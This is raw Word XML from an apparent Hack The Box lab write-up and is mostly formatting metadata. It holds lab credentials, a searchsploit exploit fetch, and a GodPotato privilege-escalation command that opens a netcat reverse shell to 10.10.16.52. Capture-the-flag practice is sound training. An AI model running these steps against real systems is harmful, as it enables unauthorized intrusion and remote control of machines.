      <w:r w:rsidRPr="00DD6D07">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>baconandcheese</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA9F5EA" w14:textId="77777777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1EF1C34B" w14:textId="491C840F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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Username: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00FA38C0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
            <w:noProof/>
            <w:lang w:bidi="he-IL"/>
          </w:rPr>
          <w:t>admin@htb.local</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="492C2A51" w14:textId="77777777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7437FCA8" w14:textId="154A0DB6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54FCB1B1" wp14:editId="7D39C470">
            <wp:extent cx="5229955" cy="3448531"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="111855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6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B637" w14:textId="66763059" w:rsidR="00DD6D07" w:rsidRDefault="00B82776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5F29C46F" wp14:editId="73C40C74">
            <wp:extent cx="5943600" cy="67945"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="142955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59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2776" w14:paraId="741FDFA6" w14:textId="77777777" w:rsidTr="00B82776">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B8E7B61" w14:textId="558E428A" w:rsidR="00B82776" w:rsidRDefault="00B82776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>
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t xml:space="preserve">Searchsploit -m </w:t>
            </w:r>
            <w:r w:rsidRPr="00B82776">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>aspx/webapps/49488.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="69F24386" w14:textId="77777777" w:rsidR="00B82776" w:rsidRDefault="00B82776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6A9F8905" wp14:editId="05587896">
            <wp:extent cx="5943600" cy="535305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14100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07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71E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Got the code from here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00B82776">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
            <w:noProof/>
            <w:lang w:bidi="he-IL"/>
          </w:rPr>
          <w:t>Online - Reverse Shell Generator</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77A5C69B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1E30CA0E" wp14:editId="50C44AE2">
            <wp:extent cx="3448531" cy="685896"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="160433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7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43E4" w14:textId="6DC929EF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595AAF6E" wp14:editId="3A34F06E">
            <wp:extent cx="4991797" cy="1371791"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18787081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819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677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27A2219D" w14:textId="37CF8734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2F82A7F0" wp14:editId="4271780E">
            <wp:extent cx="5601482" cy="3153215"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="193855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1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64" w14:paraId="0CA82B05" w14:textId="77777777" w:rsidTr="00850564">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24C74B80" w14:textId="63DC8C4E" w:rsidR="00850564" w:rsidRDefault="00850564" w:rsidP="00B82776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850564">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>whoami /priv</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54F4CADB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0C6AD3E0" w14:textId="313AAF8A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t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00850564" w:rsidRPr="00850564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336D1C19" wp14:editId="6568B51E">
            <wp:extent cx="5943600" cy="1917065"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="186821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4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64" w14:paraId="6ADB5853" w14:textId="77777777" w:rsidTr="00850564">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="787CE7F3" w14:textId="412FC2F0" w:rsidR="00850564" w:rsidRDefault="00850564" w:rsidP="00B82776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850564">
              <w:rPr>
                <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
                <w:noProof/>
                <w:lang w:bidi="he-IL"/>
              </w:rPr>
              <w:t>.\GodPotato-NET4.exe -cmd "C:\Users\Public\nc.exe -e cmd.exe 10.10.16.52 4444"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="216B6B8F" w14:textId="471ED3D4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0564">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04B13A78" wp14:editId="512D3571">
            <wp:extent cx="5229955" cy="1848108"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="24734147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1472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3344" w14:textId="6F8ACDA3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0564">
        <w:rPr>
          <w:rFonts w:ascii="DejaVu Sans" w:hAnsi="DejaVu Sans" w:cs="Calibri"/>
          <w:noProof/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AFFDFC0" wp14:editId="1A3430C3">
            <wp:extent cx="5943600" cy="2452370"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="5218628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2825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9368" w14:textId="27B668A7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0564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1BD9A48A" wp14:editId="538BE8BD">
            <wp:extent cx="5591955" cy="3982006"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="181355569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55698" name="Picture 1" descr="A computer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57B" w14:textId="77777777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00A15CAF" w14:textId="77777777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68E70575" w14:textId="0FBEC784" w:rsidR="00B82776" w:rsidRPr="00C806EA" w:rsidRDefault="00B82776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sectPr w:rsidR="00B82776" w:rsidRPr="00C806EA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379A1A" w14:textId="77777777" w:rsidR="00A75549" w:rsidRDefault="00A75549">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="17434D54" w14:textId="77777777" w:rsidR="00A75549" w:rsidRDefault="00A75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1"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Helvetica Neue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erif">
    <w:altName w:val="Cambria"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Roboto Bold">
    <w:altName w:val="Roboto"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Roboto Regular">
    <w:altName w:val="Roboto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Verdan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10E5C" w14:textId="77777777" w:rsidR="0083611B" w:rsidRDefault="00A1278D">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr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</w:pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="9340"/>
      </w:tabs>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:t>25</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:color w:val="808080"/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:t>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30C90" w14:textId="77777777" w:rsidR="0083611B" w:rsidRDefault="00A1278D">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:pBdr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</w:pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="9340"/>
      </w:tabs>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:t>25</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="NoneA"/>
        <w:noProof/>
        <w:lang w:bidi="he-IL"/>
      </w:rPr>
      <w:t xml:space="preserve"> | </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:color w:val="808080"/>
        <w:lang w:bidi="he-IL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D7456" w14:textId="77777777" w:rsidR="00A75549" w:rsidRDefault="00A75549">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="713DBC85" w14:textId="77777777" w:rsidR="00A75549" w:rsidRDefault="00A755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0A3F3" w14:textId="77777777" w:rsidR="0083611B" w:rsidRDefault="0083611B">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="9340"/>
      </w:tabs>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:noProof/>
        <w:lang w:bidi="he-I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8FD3E" w14:textId="77777777" w:rsidR="0083611B" w:rsidRDefault="0083611B">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="9360"/>
        <w:tab w:val="right" w:pos="9340"/>
      </w:tabs>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:noProof/>
        <w:lang w:bidi="he-I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C7B81"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B2FA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50B8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3D4C8B4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4B217C9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60AC245C"/>
    <w:lvl w:ilvl="0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</w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1EE56807"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="654805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542454E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="25B292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64179"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F37A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B16273"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5552A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452312">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1768883662">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="801967480">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1842576409">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1008600142">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="605695314">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1687976656">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="962266892">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="1">
      <w:lvl w:ilvl="1">
        <w:numFmt w:val="decimal"/>
        <w:lvlText w:val="%2."/>
        <w:lvlJc w:val="left"/>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1249845810">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1376660188">
    <w:abstractNumId w:val="6"/>
    <w:lvlOverride w:ilvl="1">
      <w:lvl w:ilvl="1">
        <w:numFmt w:val="decimal"/>
        <w:lvlText w:val="%2."/>
        <w:lvlJc w:val="left"/>
      </w:lvl>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="73826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11B"/>
    <w:rsid w:val="00002691"/>
    <w:rsid w:val="00010FD5"/>
    <w:rsid w:val="00012175"/>
    <w:rsid w:val="00016757"/>
    <w:rsid w:val="000254D0"/>
    <w:rsid w:val="00026527"/>
    <w:rsid w:val="00026BE5"/>
    <w:rsid w:val="000438ED"/>
    <w:rsid w:val="0005672F"/>
    <w:rsid w:val="00062F38"/>
    <w:rsid w:val="0006492D"/>
    <w:rsid w:val="000708C2"/>
    <w:rsid w:val="00071516"/>
    <w:rsid w:val="00085C56"/>
    <w:rsid w:val="00086EB9"/>
    <w:rsid w:val="000916BD"/>
    <w:rsid w:val="000A50CE"/>
    <w:rsid w:val="000A6BEB"/>
    <w:rsid w:val="000B0E24"/>
    <w:rsid w:val="000B1091"/>
    <w:rsid w:val="000B152C"/>
    <w:rsid w:val="000D4925"/>
    <w:rsid w:val="000F0A52"/>
    <w:rsid w:val="001000C6"/>
    <w:rsid w:val="0010120E"/>
    <w:rsid w:val="00102385"/>
    <w:rsid w:val="0010366D"/>
    <w:rsid w:val="00105276"/>
    <w:rsid w:val="00105D0F"/>
    <w:rsid w:val="001068AE"/>
    <w:rsid w:val="001136F7"/>
    <w:rsid w:val="00116ED5"/>
    <w:rsid w:val="00117BDB"/>
    <w:rsid w:val="00126769"/>
    <w:rsid w:val="00136898"/>
    <w:rsid w:val="00136FDF"/>
    <w:rsid w:val="00144625"/>
    <w:rsid w:val="00152F88"/>
    <w:rsid w:val="0017020E"/>
    <w:rsid w:val="00170AAF"/>
    <w:rsid w:val="00173DD6"/>
    <w:rsid w:val="00181386"/>
    <w:rsid w:val="00182AD1"/>
    <w:rsid w:val="001846F9"/>
    <w:rsid w:val="00187BE2"/>
    <w:rsid w:val="001A049F"/>
    <w:rsid w:val="001B0C53"/>
    <w:rsid w:val="001B6872"/>
    <w:rsid w:val="001B7187"/>
    <w:rsid w:val="001B7CA4"/>
    <w:rsid w:val="001C04B8"/>
    <w:rsid w:val="001C11A9"/>
    <w:rsid w:val="001C1577"/>
    <w:rsid w:val="001F2014"/>
    <w:rsid w:val="001F2A6F"/>
    <w:rsid w:val="001F48D3"/>
    <w:rsid w:val="001F791B"/>
    <w:rsid w:val="00217810"/>
    <w:rsid w:val="00226555"/>
    <w:rsid w:val="00240E51"/>
    <w:rsid w:val="00246ADF"/>
    <w:rsid w:val="00254132"/>
    <w:rsid w:val="00254BC3"/>
    <w:rsid w:val="0026524E"/>
    <w:rsid w:val="00267200"/>
    <w:rsid w:val="00271257"/>
    <w:rsid w:val="00272F95"/>
    <w:rsid w:val="00285A8A"/>
    <w:rsid w:val="0028695A"/>
    <w:rsid w:val="00287CCB"/>
    <w:rsid w:val="002A0BC4"/>
    <w:rsid w:val="002A5939"/>
    <w:rsid w:val="002B42D6"/>
    <w:rsid w:val="002C3D56"/>
    <w:rsid w:val="002C57C3"/>
    <w:rsid w:val="002E52F9"/>
    <w:rsid w:val="002F1C93"/>
    <w:rsid w:val="002F2B03"/>
    <w:rsid w:val="002F71A9"/>
    <w:rsid w:val="00304FAF"/>
    <w:rsid w:val="00321276"/>
    <w:rsid w:val="00325016"/>
    <w:rsid w:val="00325AD5"/>
    <w:rsid w:val="00330592"/>
    <w:rsid w:val="003319C3"/>
    <w:rsid w:val="00332E1A"/>
    <w:rsid w:val="003405BD"/>
    <w:rsid w:val="00362A36"/>
    <w:rsid w:val="003641BE"/>
    <w:rsid w:val="003653E0"/>
    <w:rsid w:val="00371B31"/>
    <w:rsid w:val="00375C32"/>
    <w:rsid w:val="00377B25"/>
    <w:rsid w:val="0038163F"/>
    <w:rsid w:val="0039071C"/>
    <w:rsid w:val="003A3FC3"/>
    <w:rsid w:val="003B1C92"/>
    <w:rsid w:val="003B31C8"/>
    <w:rsid w:val="003B7C3A"/>
    <w:rsid w:val="003C47D1"/>
    <w:rsid w:val="003F02CC"/>
    <w:rsid w:val="003F24F7"/>
    <w:rsid w:val="00406478"/>
    <w:rsid w:val="004103DA"/>
    <w:rsid w:val="00416B76"/>
    <w:rsid w:val="004216F6"/>
    <w:rsid w:val="00434500"/>
    <w:rsid w:val="00436CF1"/>
    <w:rsid w:val="00447B33"/>
    <w:rsid w:val="00451917"/>
    <w:rsid w:val="004553B0"/>
    <w:rsid w:val="00457654"/>
    <w:rsid w:val="004774E6"/>
    <w:rsid w:val="00487F9B"/>
    <w:rsid w:val="00490B95"/>
    <w:rsid w:val="004A2F73"/>
    <w:rsid w:val="004A6656"/>
    <w:rsid w:val="004C744F"/>
    <w:rsid w:val="004D6C08"/>
    <w:rsid w:val="004E634F"/>
    <w:rsid w:val="00501199"/>
    <w:rsid w:val="00501524"/>
    <w:rsid w:val="0050217F"/>
    <w:rsid w:val="005564A4"/>
    <w:rsid w:val="00560B39"/>
    <w:rsid w:val="00572953"/>
    <w:rsid w:val="005734A9"/>
    <w:rsid w:val="005775D5"/>
    <w:rsid w:val="00581063"/>
    <w:rsid w:val="00583E36"/>
    <w:rsid w:val="005A5C3B"/>
    <w:rsid w:val="005A5D66"/>
    <w:rsid w:val="005A6DB6"/>
    <w:rsid w:val="005B3582"/>
    <w:rsid w:val="005B3D44"/>
    <w:rsid w:val="005C0951"/>
    <w:rsid w:val="005C6D41"/>
    <w:rsid w:val="005D2180"/>
    <w:rsid w:val="005D5E3B"/>
    <w:rsid w:val="005D6A98"/>
    <w:rsid w:val="005E22F6"/>
    <w:rsid w:val="005E7D6B"/>
    <w:rsid w:val="005F117A"/>
    <w:rsid w:val="005F1F7E"/>
    <w:rsid w:val="005F5453"/>
    <w:rsid w:val="005F6605"/>
    <w:rsid w:val="00602D9B"/>
    <w:rsid w:val="00605777"/>
    <w:rsid w:val="00606274"/>
    <w:rsid w:val="00606BA3"/>
    <w:rsid w:val="00607DD2"/>
    <w:rsid w:val="006169E1"/>
    <w:rsid w:val="00620723"/>
    <w:rsid w:val="00622A71"/>
    <w:rsid w:val="00626DF8"/>
    <w:rsid w:val="00635F52"/>
    <w:rsid w:val="00636AB2"/>
    <w:rsid w:val="006379CD"/>
    <w:rsid w:val="0064478C"/>
    <w:rsid w:val="00655436"/>
    <w:rsid w:val="006619AB"/>
    <w:rsid w:val="006619B2"/>
    <w:rsid w:val="00664F76"/>
    <w:rsid w:val="00671AEE"/>
    <w:rsid w:val="006746C7"/>
    <w:rsid w:val="00680723"/>
    <w:rsid w:val="00692977"/>
    <w:rsid w:val="006934CF"/>
    <w:rsid w:val="006948EB"/>
    <w:rsid w:val="006A3151"/>
    <w:rsid w:val="006B4BC8"/>
    <w:rsid w:val="006C08A7"/>
    <w:rsid w:val="006C2FBA"/>
    <w:rsid w:val="006D1F75"/>
    <w:rsid w:val="006D339B"/>
    <w:rsid w:val="006D3E77"/>
    <w:rsid w:val="006D5F6B"/>
    <w:rsid w:val="006D6597"/>
    <w:rsid w:val="006E4AE4"/>
    <w:rsid w:val="006F2E6E"/>
    <w:rsid w:val="006F5DB1"/>
    <w:rsid w:val="00703307"/>
    <w:rsid w:val="007103C2"/>
    <w:rsid w:val="0071223B"/>
    <w:rsid w:val="00715168"/>
    <w:rsid w:val="00724092"/>
    <w:rsid w:val="007310DC"/>
    <w:rsid w:val="00733F22"/>
    <w:rsid w:val="00734DA3"/>
    <w:rsid w:val="00735C78"/>
    <w:rsid w:val="007378D1"/>
    <w:rsid w:val="00737B7F"/>
    <w:rsid w:val="007403B3"/>
    <w:rsid w:val="00744A56"/>
    <w:rsid w:val="007460C3"/>
    <w:rsid w:val="00760A1A"/>
    <w:rsid w:val="0076206E"/>
    <w:rsid w:val="00764B7E"/>
    <w:rsid w:val="00770CB3"/>
    <w:rsid w:val="00772A08"/>
    <w:rsid w:val="00774A1A"/>
    <w:rsid w:val="00784B61"/>
    <w:rsid w:val="00794503"/>
    <w:rsid w:val="007A2663"/>
    <w:rsid w:val="007A27D3"/>
    <w:rsid w:val="007A6863"/>
    <w:rsid w:val="007C0A5B"/>
    <w:rsid w:val="007C6B38"/>
    <w:rsid w:val="007D1D90"/>
    <w:rsid w:val="007D3B33"/>
    <w:rsid w:val="007D4F05"/>
    <w:rsid w:val="007D643D"/>
    <w:rsid w:val="007D769E"/>
    <w:rsid w:val="007D77C3"/>
    <w:rsid w:val="007F6305"/>
    <w:rsid w:val="007F6937"/>
    <w:rsid w:val="007F6E43"/>
    <w:rsid w:val="008002B7"/>
    <w:rsid w:val="00803E2F"/>
    <w:rsid w:val="00820D47"/>
    <w:rsid w:val="0082142A"/>
    <w:rsid w:val="00827667"/>
    <w:rsid w:val="0083336C"/>
    <w:rsid w:val="0083611B"/>
    <w:rsid w:val="00844A2A"/>
    <w:rsid w:val="00850564"/>
    <w:rsid w:val="008575A3"/>
    <w:rsid w:val="0085768E"/>
    <w:rsid w:val="00864277"/>
    <w:rsid w:val="00865EA9"/>
    <w:rsid w:val="0087745C"/>
    <w:rsid w:val="00883649"/>
    <w:rsid w:val="00890BA6"/>
    <w:rsid w:val="008913BC"/>
    <w:rsid w:val="008A54A4"/>
    <w:rsid w:val="008A6EF0"/>
    <w:rsid w:val="008A7A20"/>
    <w:rsid w:val="008B7028"/>
    <w:rsid w:val="008C04F7"/>
    <w:rsid w:val="008C0592"/>
    <w:rsid w:val="008C2185"/>
    <w:rsid w:val="008C30C5"/>
    <w:rsid w:val="008C5CFA"/>
    <w:rsid w:val="008C72FD"/>
    <w:rsid w:val="008D081B"/>
    <w:rsid w:val="008D273C"/>
    <w:rsid w:val="008D6A1D"/>
    <w:rsid w:val="008E0BA8"/>
    <w:rsid w:val="008E1300"/>
    <w:rsid w:val="008E299B"/>
    <w:rsid w:val="008E51A7"/>
    <w:rsid w:val="008E5B6C"/>
    <w:rsid w:val="008F40A0"/>
    <w:rsid w:val="00901654"/>
    <w:rsid w:val="009058DF"/>
    <w:rsid w:val="00906D0E"/>
    <w:rsid w:val="009070CC"/>
    <w:rsid w:val="00916D2F"/>
    <w:rsid w:val="00926BD0"/>
    <w:rsid w:val="00943795"/>
    <w:rsid w:val="009444B8"/>
    <w:rsid w:val="00945853"/>
    <w:rsid w:val="0097287F"/>
    <w:rsid w:val="009728DD"/>
    <w:rsid w:val="00973B66"/>
    <w:rsid w:val="00975AFE"/>
    <w:rsid w:val="00981779"/>
    <w:rsid w:val="00993D41"/>
    <w:rsid w:val="00997473"/>
    <w:rsid w:val="009A0693"/>
    <w:rsid w:val="009A74AE"/>
    <w:rsid w:val="009B0A1F"/>
    <w:rsid w:val="009B1A8B"/>
    <w:rsid w:val="009B231A"/>
    <w:rsid w:val="009B7328"/>
    <w:rsid w:val="009C624A"/>
    <w:rsid w:val="009C6273"/>
    <w:rsid w:val="009D5EC7"/>
    <w:rsid w:val="009E790E"/>
    <w:rsid w:val="00A02CD8"/>
    <w:rsid w:val="00A038D5"/>
    <w:rsid w:val="00A05090"/>
    <w:rsid w:val="00A1278D"/>
    <w:rsid w:val="00A22222"/>
    <w:rsid w:val="00A23379"/>
    <w:rsid w:val="00A3145D"/>
    <w:rsid w:val="00A34F9F"/>
    <w:rsid w:val="00A3637B"/>
    <w:rsid w:val="00A402EA"/>
    <w:rsid w:val="00A40F47"/>
    <w:rsid w:val="00A41F94"/>
    <w:rsid w:val="00A44BF8"/>
    <w:rsid w:val="00A46762"/>
    <w:rsid w:val="00A51B55"/>
    <w:rsid w:val="00A60268"/>
    <w:rsid w:val="00A66E1C"/>
    <w:rsid w:val="00A701FB"/>
    <w:rsid w:val="00A75549"/>
    <w:rsid w:val="00A91453"/>
    <w:rsid w:val="00A95171"/>
    <w:rsid w:val="00AA30EA"/>
    <w:rsid w:val="00AA500B"/>
    <w:rsid w:val="00AA6E2B"/>
    <w:rsid w:val="00AA71E2"/>
    <w:rsid w:val="00AA7DB0"/>
    <w:rsid w:val="00AB0776"/>
    <w:rsid w:val="00AB16FD"/>
    <w:rsid w:val="00AB4E8F"/>
    <w:rsid w:val="00AB5325"/>
    <w:rsid w:val="00AB6767"/>
    <w:rsid w:val="00AC2359"/>
    <w:rsid w:val="00AC46FD"/>
    <w:rsid w:val="00AC6BB2"/>
    <w:rsid w:val="00AC74AA"/>
    <w:rsid w:val="00AE299E"/>
    <w:rsid w:val="00AE726A"/>
    <w:rsid w:val="00AE73CA"/>
    <w:rsid w:val="00AF26E5"/>
    <w:rsid w:val="00B06D6F"/>
    <w:rsid w:val="00B339FE"/>
    <w:rsid w:val="00B339FF"/>
    <w:rsid w:val="00B33AAE"/>
    <w:rsid w:val="00B40015"/>
    <w:rsid w:val="00B45225"/>
    <w:rsid w:val="00B4766A"/>
    <w:rsid w:val="00B644B9"/>
    <w:rsid w:val="00B72989"/>
    <w:rsid w:val="00B81E98"/>
    <w:rsid w:val="00B82776"/>
    <w:rsid w:val="00B86D0E"/>
    <w:rsid w:val="00B9105E"/>
    <w:rsid w:val="00BA620B"/>
    <w:rsid w:val="00BA7369"/>
    <w:rsid w:val="00BB3F5F"/>
    <w:rsid w:val="00BB7EC2"/>
    <w:rsid w:val="00BD3572"/>
    <w:rsid w:val="00BD4674"/>
    <w:rsid w:val="00BF71EA"/>
    <w:rsid w:val="00C038F0"/>
    <w:rsid w:val="00C05A3B"/>
    <w:rsid w:val="00C16176"/>
    <w:rsid w:val="00C3114D"/>
    <w:rsid w:val="00C34487"/>
    <w:rsid w:val="00C42531"/>
    <w:rsid w:val="00C42C75"/>
    <w:rsid w:val="00C46107"/>
    <w:rsid w:val="00C5732E"/>
    <w:rsid w:val="00C67635"/>
    <w:rsid w:val="00C8065A"/>
    <w:rsid w:val="00C806EA"/>
    <w:rsid w:val="00C83E44"/>
    <w:rsid w:val="00C9035C"/>
    <w:rsid w:val="00C90C14"/>
    <w:rsid w:val="00CA0AE5"/>
    <w:rsid w:val="00CA1A5D"/>
    <w:rsid w:val="00CA3FA6"/>
    <w:rsid w:val="00CB4FE3"/>
    <w:rsid w:val="00CC1BDB"/>
    <w:rsid w:val="00CC60A4"/>
    <w:rsid w:val="00CD3107"/>
    <w:rsid w:val="00CD5A76"/>
    <w:rsid w:val="00CD6592"/>
    <w:rsid w:val="00CE0D5A"/>
    <w:rsid w:val="00CE1BA7"/>
    <w:rsid w:val="00CE26B4"/>
    <w:rsid w:val="00CE4738"/>
    <w:rsid w:val="00CE4D4E"/>
    <w:rsid w:val="00CE59CC"/>
    <w:rsid w:val="00CF1CAC"/>
    <w:rsid w:val="00CF28FB"/>
    <w:rsid w:val="00CF3BDB"/>
    <w:rsid w:val="00D018B0"/>
    <w:rsid w:val="00D0242A"/>
    <w:rsid w:val="00D032C5"/>
    <w:rsid w:val="00D11277"/>
    <w:rsid w:val="00D130CF"/>
    <w:rsid w:val="00D262E6"/>
    <w:rsid w:val="00D60020"/>
    <w:rsid w:val="00D615F4"/>
    <w:rsid w:val="00D648D1"/>
    <w:rsid w:val="00D706EB"/>
